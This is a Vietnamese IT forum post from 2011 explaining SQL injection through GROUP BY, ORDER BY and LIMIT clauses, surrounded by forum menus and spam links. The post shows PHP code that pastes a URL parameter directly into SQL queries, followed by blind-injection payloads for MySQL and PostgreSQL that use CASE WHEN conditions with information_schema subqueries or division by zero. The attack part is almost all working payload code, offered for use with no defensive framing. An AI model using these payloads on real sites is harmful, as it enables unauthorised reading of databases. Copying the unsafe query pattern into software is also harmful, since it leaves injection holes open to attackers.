Chào mừng bạn đến với ITVNN FORUM - Diễn đàn công nghệ thông tin.

Nếu đây là lần đầu tiên bạn tham gia diễn đàn, xin mời bạn xem phần Hỏi/Ðáp để biết cách dùng diễn đàn. Để có thể tham gia thảo luận bạn phải đăng ký làm thành viên, click vào đây để đăng ký.

Liên kết hữu ích: Công ty Truyền thông - Sự kiện Gia Lai | Việt Nam Anh Hùng | Điện Lạnh Gia Lai | Xe tải nhận chở hàng Pleiku | Thêm textlink của bạn

Partner Area

kết quả từ 1 tới 1 trên 1

Ðề tài: Kỹ thuật tấn công Sql Injection thông qua Group by,Order by,Limit

Ðiều Chỉnh
Display
- Linear Mode
- Switch to Hybrid Mode
- Switch to Threaded Mode

15-04-2011, 09:48 AM #1
Cơn Gió

Xem Hồ Sơ

View Forum Posts

Nhắn Tin Riêng
Đầy Tớ Nhân Dân™

Trạng thái
Offline

Tham gia ngày
Jun 2010

Thành viên thứ
24343

Giới tính

Bài gởi
748

Level: 44 [?]
Experience: 3,780,309
Next Level: 4,297,834

Cảm ơn 96

Cảm ơn 265 lần / 159 Bài viết
Kỹ thuật tấn công Sql Injection thông qua Group by,Order by,Limit
Thông thường các bạn thường tấn công SQL Injection theo mệnh đề where trong câu lệnh select.Hôm nay sẽ mở rộng thêm cách tấn công thông qua Group by,Order by,Limit
GROUP BY
vd :đối với MySQL

Code:

"SELECT id, name FROM users GROUP BY " . $_GET['id']

ta có thể biến đổi như sau

Code:

SELECT id, name FROM users GROUP BY 1, (SELECT (CASE WHEN (điều kiện) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END))

ORDER BY
vd: đối với PostgreSQL

Code:

"SELECT id, name FROM users ORDER BY " . $_GET['id']

thành

Code:

SELECT id, name FROM users ORDER BY 1, (SELECT (CASE WHEN (điều kiện) THEN 1 ELSE 1/0 END))

LIMIT
vd: đối với MySQL

Code:

"SELECT id, name FROM users LIMIT 0, " . $_GET['id']

thành

Code:

SELECT id, name FROM users LIMIT 0, 1 UNION ALL SELECT (CASE WHEN (điều kiện) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END), NULL
Ở đời , khôn sống , dại chết , ngu thì thua thiệt
Thế thái lạnh như băng , tình người mỏng như tờ giấy
Chủ đề mới cùng chuyên mục
- » Dịch vụ đáo hạn thẻ tín dụng quận bình thạnh (08/11/2023)
- » Xem trực tiếp và xem lại các trận đấu (18/07/2023)
- » Xóa dữ liệu để không thể khôi phục! (24/03/2023)
- » 7 ứng dụng VPN cho Android người dùng nên tránh xa (15/02/2022)
- » Safe Web: Bảo vệ bạn trước trang web độc hại, khiêu... (27/02/2021)
- » IT security và Các hệ thống IT Security chất lượng... (26/11/2020)
- » Các cách bảo vệ tài khoản Google an toàn khi lên mạng (19/10/2019)
- » Bảo mật mạng CCNA những điều bạn nên biết (07/02/2018)
- » Cách thức sử dụng visual basic để mã hoá virus (27/11/2017)
- » Cách thay đổi Host ID của máy tính (19/05/2017)
Có thể bạn quan tâm
- » Nâng ngực có ảnh hưởng đến việc cho con bú không? (27/04/2024)
- » Dịch vụ thay màn hình tivi samsung giá rẻ bất ngờ (27/04/2024)
- » Miếng dán nâng ngực giá bao nhiêu tiền? (27/04/2024)
- » Hình ảnh phẫu thuật nâng ngực| Thẩm mỹ viện Ngô Mộng... (27/04/2024)
- » Hướng dẫn tải Apps game, bóng. (27/04/2024)
- » Hình ảnh nâng ngực đẹp| Bệnh viện thẩm mỹ Ngô Mộng Hùng (27/04/2024)
- » Ví da nam davis tinh tế trong thiết kế (27/04/2024)
- » Giá phẫu thuật nâng ngực bao nhiêu tiền? (27/04/2024)
- » Chất lượng của ví nam d&g chính hãng (27/04/2024)
- » Ví da nam biluxury phong cách và đẳng cấp (27/04/2024)
Trả Lời Với Trích Dẫn
The Following 4 Thank You to Cơn Gió For This Useful Post:

Dunglx (15-04-2011),Duyệt Nguyễn (08-07-2011),hanhkhat (28-04-2011),Lovev_Lovev (10-08-2011)